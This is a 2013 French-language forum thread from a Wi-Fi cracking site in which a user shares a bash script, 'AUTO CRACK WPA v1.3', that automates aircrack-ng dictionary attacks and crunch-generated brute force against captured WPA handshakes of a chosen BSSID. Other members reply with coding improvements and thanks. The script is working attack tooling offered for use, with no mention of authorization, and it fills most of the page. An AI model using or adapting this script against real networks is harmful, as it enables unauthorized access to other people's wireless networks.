Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 28-01-2013 14:46:23

Leax
N00b
Inscription : 04-01-2013
Messages : 2

AUTO CRACK WPA - v1.3

Bonjour à tous,

Un petit partage pour vous, c'est un bash qui permet d'automatiser aircrack-ng et crunch+aircrack-ng

Je cherche simplement à définir une clé de départ pour crunch, afin déviter de commencer de 0000000000000000000000000

Je vous laisse jetter un coup d'oeil et si vous avez une remarque constructive, n'hésitez pas à poster.
a+ smile


# Créé par Leax (janvier 2013)
# sur BT 5 r3
# www.crack-wpa.fr


# intro
clear
intro="\n
##################################\n
##### AUTO CRACK WPA - v1.3  #####\n
##########Crée par Leax###########\n
##################################"

echo -e $intro
echo
echo "_____________________________________________________"
echo
echo "d: Cracker une WPA par FICHIER DICTIONNAIRE"
echo "c: Cracker une WPA par DICTIONNAIRE PIPE (crunch)"
echo "a: A propos..."
echo "x: Quitter"
echo "_____________________________________________________"
echo
echo "Entrez votre choix :"
read choix
case $choix in

a)
clear
echo "#################################"
echo "### A propos d'Auto_crack_wpa ###"
echo "#################################"
echo
echo
echo "Ce script a été créé afin d'automatiser la commande d'aircrack-ng :"
echo "aircrack-ng -p <Nombre de proceseur> <Fichier capture handshake> -w <Fichier dictionnaire>"
echo
echo "et la commande crunch | aircrack-ng :"
echo "crunch 26 26 0123456789ABCDEF --stdout | aircrack-ng -p <Nombre de proceseur> -b <Adresse MAC bssid> -w -  <Fichier capture handshake>"
echo
echo
echo "L'option -p permet d'indiquer à aircrack-ng de combien il disposera de puissance proceseur pour lire X clées par seconde."
echo "Pour exemple, si votre ordinateur est équipé d'un quadcore. Vous verrez au moment d'indiquer le nombre de proceseur à exploiter :"
echo "Nb CPU detected: 4"
echo
echo "Alors vous aurez le choix entre 1, 2, 3 ou 4."
echo "Attention toute fois si vous utilisez une importante puissance!"
echo 
echo "Veillez à la température du proceseur! Car évidement, plus il calcul, plus il chauffe!!"
echo "Bon crack :)"
echo "-----------------------------------------------------------"
echo
echo "Crée le 26 janvier 2012"
echo "Par Leax"
echo
echo "Appuyez sur la touche Entrer pour retourner au menu."
read nul
$0;;


x)
exit
$0;;


d)
clear
echo "###################################################"
echo "### Crackage d'une WPA par FICHIER DICTIONNAIRE ###"
echo "###################################################"
echo
echo "- - - - - - - - - - - - - - - - - - - - - - - - - -"
echo "Chemin de la capture du handshake [?]  (A définir)"
echo "Chemin du fichier dictionnaire [?]  (A définir)"
echo "Nombre de proceseur à exploiter [?]  (A définir)"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo
echo "Indiquez le chemin du fichier de capture du handshake :"
echo "(Glissez/Déposez le fichier ici, puis validez)"
echo
read pathcap1
clear

echo "###################################################"
echo "### Crackage d'une WPA par FICHIER DICTIONNAIRE ###"
echo "###################################################"
echo
echo "- - - - - - - - - - - - - - - - - - - - - - - - - -"
echo "Chemin de la capture du handshake [OK]  ($pathcap1)"
echo "Chemin du fichier dictionnaire [?]  (A définir)"
echo "Nombre de proceseur à exploiter [?]  (A définir)"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo
echo "Indiquez le chemin du fichier dictionnaire :"
echo "(Glissez/Déposez le fichier ici, puis validez)"
echo
read pathdico
clear

echo "###################################################"
echo "### Crackage d'une WPA par FICHIER DICTIONNAIRE ###"
echo "###################################################"
echo
echo "- - - - - - - - - - - - - - - - - - - - - - - - - -"
echo "Chemin de la capture du handshake [OK]  ($pathcap1)"
echo "Chemin du fichier dictionnaire [OK]  ($pathdico)"
echo "Nombre de proceseur à exploiter [?]  (A définir)..."
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
# trouver comment adapter code pour sh
#				printf("Nb CPU detected: %d ", cpu_count);
#if defined(__i386__) || defined(__x86_64__)
#				unused = shasse2_cpuid();
#
#				if (unused == 1) {
#					printf(" (MMX available)");
#				}
#				if (unused >= 2) {
#					printf(" (SSE2 available)");
#				}
#endif
echo
echo "Indiquez le nombre de proceseur à exploiter :"
echo "(Attention à la montée en température!)"
aircrack-ng -u
echo
read procs
clear

echo "###################################################"
echo "### Crackage d'une WPA par FICHIER DICTIONNAIRE ###"
echo "###################################################"
echo
echo "- - - - - - - - - - - - - - - - - - - - - - - - - -"
echo "Chemin de la capture du handshake [OK]  ($pathcap1)"
echo "Chemin du fichier dictionnaire [OK]  ($pathdico)"
echo "Nombre de proceseur à exploiter [OK]  ($procs)"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo
echo "Le crackage WPA va commencer ! 5 ....."
sleep 1
clear

echo "###################################################"
echo "### Crackage d'une WPA par FICHIER DICTIONNAIRE ###"
echo "###################################################"
echo
echo "- - - - - - - - - - - - - - - - - - - - - - - - - -"
echo "Chemin de la capture du handshake [OK]  ($pathcap1)"
echo "Chemin du fichier dictionnaire [OK]  ($pathdico)"
echo "Nombre de proceseur à exploiter [OK]  ($procs)"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo
echo "Le crackage WPA va commencer ! 4 ...."
sleep 1
clear

echo "###################################################"
echo "### Crackage d'une WPA par FICHIER DICTIONNAIRE ###"
echo "###################################################"
echo
echo "- - - - - - - - - - - - - - - - - - - - - - - - - -"
echo "Chemin de la capture du handshake [OK]  ($pathcap1)"
echo "Chemin du fichier dictionnaire [OK]  ($pathdico)"
echo "Nombre de proceseur à exploiter [OK]  ($procs)"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo
echo "Le crackage WPA va commencer ! 3 ..."
sleep 1
clear

echo "###################################################"
echo "### Crackage d'une WPA par FICHIER DICTIONNAIRE ###"
echo "###################################################"
echo
echo "- - - - - - - - - - - - - - - - - - - - - - - - - -"
echo "Chemin de la capture du handshake [OK]  ($pathcap1)"
echo "Chemin du fichier dictionnaire [OK]  ($pathdico)"
echo "Nombre de proceseur à exploiter [OK]  ($procs)"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo
echo "Le crackage WPA va commencer ! 2 .."
sleep 1
clear

echo "###################################################"
echo "### Crackage d'une WPA par FICHIER DICTIONNAIRE ###"
echo "###################################################"
echo
echo "- - - - - - - - - - - - - - - - - - - - - - - - - -"
echo "Chemin de la capture du handshake [OK]  ($pathcap1)"
echo "Chemin du fichier dictionnaire [OK]  ($pathdico)"
echo "Nombre de proceseur à exploiter [OK]  ($procs)"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo
echo "Le crackage WPA va commencer ! 1 ."
sleep 1
clear

aircrack-ng -p $procs $pathcap1 -w $pathdico

echo
echo "###################################################"
echo "### Crackage d'une WPA par FICHIER DICTIONNAIRE ###"
echo "###################################################"
echo
echo "Fin de calcul !"
echo "Appuyez sur la touche Entrer pour retourner au menu."
read nul
$0;;

#----------------------------------------------------------------------------------------

c)
clear
echo "#########################################################"
echo "### Crackage d'une WPA par DICTIONNAIRE PIPE (crunch) ###"
echo "#########################################################"
echo
echo "- - - - - - - - - - - - - - - - - - - - - - - - - -"
echo "Chemin de la capture du handshake -[?]  (A définir)"
echo "Adresse MAC du BSSID [?]  (A définir)"
echo "Nombre de proceseur à exploiter [?]  (A définir)"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo
echo "Indiquez le chemin du fichier de capture du handshake :"
echo "(Glissez/Déposez le fichier ici, puis validez)"
echo
read pathcap2

clear
echo "#########################################################"
echo "### Crackage d'une WPA par DICTIONNAIRE PIPE (crunch) ###"
echo "#########################################################"
echo
echo "- - - - - - - - - - - - - - - - - - - - - - - - - -"
echo "Chemin de la capture du handshake -[OK]  ($pathcap2)"
echo "Adresse MAC du BSSID [?]  (A définir)"
echo "Nombre de proceseur à exploiter [?]  (A définir)"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo
echo "Indiquez l'adresse MAC du BSSID :"
echo "(exemple: 00:1F:6A:41:48:2B, On peut la trouver dans le fichier .csv)"
echo "(Copier/Coller l'adresse ici, puis validez)"
echo
read bssid
clear

clear
echo "#########################################################"
echo "### Crackage d'une WPA par DICTIONNAIRE PIPE (crunch) ###"
echo "#########################################################"
echo
echo "- - - - - - - - - - - - - - - - - - - - - - - - - -"
echo "Chemin de la capture du handshake [OK]  ($pathcap2)"
echo "Adresse MAC du BSSID -[OK]  ($bssid)"
echo "Nombre de proceseur à exploiter [?]  (A définir)"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo
echo "Indiquez le nombre de proceseur à exploiter :"
echo "(Attention à la montée en température!)"
aircrack-ng -u
echo
read procs
clear

echo "#########################################################"
echo "### Crackage d'une WPA par DICTIONNAIRE PIPE (crunch) ###"
echo "#########################################################"
echo
echo "- - - - - - - - - - - - - - - - - - - - - - - - - -"
echo "Chemin de la capture du handshake [OK]  ($pathcap2)"
echo "Adresse MAC du BSSID -[OK]  ($bssid)"
echo "Nombre de proceseur à exploiter [OK]  ($procs)"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo
echo "Le crackage WPA va commencer ! 5 ....."
sleep 1
clear

echo "#########################################################"
echo "### Crackage d'une WPA par DICTIONNAIRE PIPE (crunch) ###"
echo "#########################################################"
echo
echo "- - - - - - - - - - - - - - - - - - - - - - - - - -"
echo "Chemin de la capture du handshake [OK]  ($pathcap2)"
echo "Adresse MAC du BSSID -[OK]  ($bssid)"
echo "Nombre de proceseur à exploiter [OK]  ($procs)"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo
echo "Le crackage WPA va commencer ! 4 ...."
sleep 1
clear

echo "#########################################################"
echo "### Crackage d'une WPA par DICTIONNAIRE PIPE (crunch) ###"
echo "#########################################################"
echo
echo "- - - - - - - - - - - - - - - - - - - - - - - - - -"
echo "Chemin de la capture du handshake [OK]  ($pathcap2)"
echo "Adresse MAC du BSSID -[OK]  ($bssid)"
echo "Nombre de proceseur à exploiter [OK]  ($procs)"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo
echo "Le crackage WPA va commencer ! 3 ..."
sleep 1
clear

echo "#########################################################"
echo "### Crackage d'une WPA par DICTIONNAIRE PIPE (crunch) ###"
echo "#########################################################"
echo
echo "- - - - - - - - - - - - - - - - - - - - - - - - - -"
echo "Chemin de la capture du handshake [OK]  ($pathcap2)"
echo "Adresse MAC du BSSID -[OK]  ($bssid)"
echo "Nombre de proceseur à exploiter [OK]  ($procs)"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo
echo "Le crackage WPA va commencer ! 2 .."
sleep 1
clear

echo "#########################################################"
echo "### Crackage d'une WPA par DICTIONNAIRE PIPE (crunch) ###"
echo "#########################################################"
echo
echo "- - - - - - - - - - - - - - - - - - - - - - - - - -"
echo "Chemin de la capture du handshake [OK]  ($pathcap2)"
echo "Adresse MAC du BSSID -[OK]  ($bssid)"
echo "Nombre de proceseur à exploiter [OK]  ($procs)"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
echo
echo "Le crackage WPA va commencer ! 1 ."
sleep 1
clear

/pentest/passwords/crunch/crunch 26 26 0123456789ABCDEF --stdout | aircrack-ng -p $procs -b $bssid -w -  $pathcap2

echo
echo "#########################################################"
echo "### Crackage d'une WPA par DICTIONNAIRE PIPE (crunch) ###"
echo "#########################################################"
echo
echo "Fin de calcul !"
echo "Appuyez sur la touche Entrer pour retourner au menu."
read nul
$0;;

esac

Dernière modification par Leax (28-01-2013 14:50:42)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 28-01-2013 15:43:03

Yannou90
Membre Radioactif
Inscription : 26-01-2013
Messages : 74
Site Web

Re : AUTO CRACK WPA - v1.3

Bonjour

Sympa mais pour être constructif :

Pour le nombre de coeurs :

NBR_COEURS="$(cat /proc/cpuinfo | grep processor | wc -l)"

Pour tes comptes à rebourt :

REB="5"

for i in $(seq 1 5 )
do
echo -e "\
###################################################
### Crackage d'une WPA par FICHIER DICTIONNAIRE ###
###################################################

- - - - - - - - - - - - - - - - - - - - - - - - - -
Chemin de la capture du handshake [OK]  ($pathcap1)
Chemin du fichier dictionnaire [OK]  ($pathdico)
Nombre de proceseur à exploiter [OK]  ($procs)
- - - - - - - - - - - - - - - - - - - - - - - - - - -

Le crackage WPA va commencer ! $REB ....."
sleep 1
(( REB-- ))
clear
done

Tu n'effectues aucunes vérification sur les variales que tu utilise :

if [[ -n "$VAR" ]]
then
  echo "ma variable n'est pas vide"
else
  echo "ma variable est vide"
fi

Ou dans une boucle pour être sur :

while [[ ! -n "$bssid" ]]
do
echo -e "\
#########################################################
### Crackage d'une WPA par DICTIONNAIRE PIPE (crunch) ###
#########################################################

- - - - - - - - - - - - - - - - - - - - - - - - - -
Chemin de la capture du handshake -[OK]  ($pathcap2)
Adresse MAC du BSSID [?]  (A définir)
Nombre de proceseur à exploiter [?]  (A définir)
- - - - - - - - - - - - - - - - - - - - - - - - - - -

Indiquez l'adresse MAC du BSSID :
(exemple: 00:1F:6A:41:48:2B, On peut la trouver dans le fichier .csv)
(Copier/Coller l'adresse ici, puis validez)"
read bssid
clear
done

Et pour finir l'utilisation de case et esac , prefere une boucle parce que la ton script va te lancer autant d'instance du même script en sous shell ; en même temps je vois pas pourquoi repasser par le menu :

while [[ ! "$QUITTER" = "0" ]]
do
  case truc in
a)
babla;;
b)
tructruc;;
x)
QUITTER="0";;
esac
done

Un peut plus propre ,  voilou tongue

Dernière modification par Yannou90 (28-01-2013 17:42:27)

Hors Ligne

#3 29-01-2013 05:48:01

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : AUTO CRACK WPA - v1.3

Merci pour l'apport et les optimisations, bon boulot les gars ! smile

Et pour finir l'utilisation de case et esac , prefere une boucle parce que la ton script va te lancer autant d'instance du même script en sous shell ;

Je ne savais pas exactement pourquoi on recommandait une utilisation mesurée des "case esac" dans un script ou pourquoi on les considérait comme "sales".
Maintenant j'y vois plus clair wink

Dernière modification par kcdtv (29-01-2013 05:49:58)

Hors Ligne

#4 29-01-2013 07:09:16

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : AUTO CRACK WPA - v1.3

Merci à vous et bienvenue Leax smile

Hors Ligne

#5 29-01-2013 18:28:54

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : AUTO CRACK WPA - v1.3

Merci wink

Hors Ligne

#6 30-01-2013 11:43:36

Leax
N00b
Inscription : 04-01-2013
Messages : 2

Re : AUTO CRACK WPA - v1.3

@ Yannou90:
Merci pour ta correction, c'est vrai que c'est bien plus propre comme ca!
Je vais (essayer d') appliquer ce que tu m'as expliquer et refaire  un boulo clean. Encore merci pour les exemples.

j'ai quelques bases en batch sur windobe. Je commence Linux depuis peu, c'est très interressant ce qu'on peut faire avec.

J'ai d'autres petits travaux en cours dans le même genre, notement créations dico wpa, merger des dictionnaires (à la volé) et trier/suppr les doublons.  Je ne métrise pas encore bien les while then if Etc.... Ca me fait des TP instructif et m'aide à comprendre. Déjà les bases, ca serra un bon début!

A bientôt

Sympa, merci pour l'accueil biere

(je saisi l'occasion pour te remercier M1k3y, car j'uttilise certains de tes scripts, c'est inspirant de voir comment ca fontionne)

Hors Ligne

#7 30-01-2013 13:04:11

Yannou90
Membre Radioactif
Inscription : 26-01-2013
Messages : 74
Site Web

Re : AUTO CRACK WPA - v1.3

De rien

Si tu as besoin d'un coup de pouce tu peut me contacter directement !
N'hésites pas surtout !

À plus !

Dernière modification par Yannou90 (30-01-2013 13:04:38)

Hors Ligne

#8 31-01-2013 01:39:58

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : AUTO CRACK WPA - v1.3

Leax a écrit :

je saisi l'occasion pour te remercier M1k3y, car j'uttilise certains de tes scripts, c'est inspirant de voir comment ca fontionne

Je t'en prie, c'est fait pour wink

D'ailleurs mes scripts contiennent aussi des bouts de code inspirés d'autres scripts, tout comme toi smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]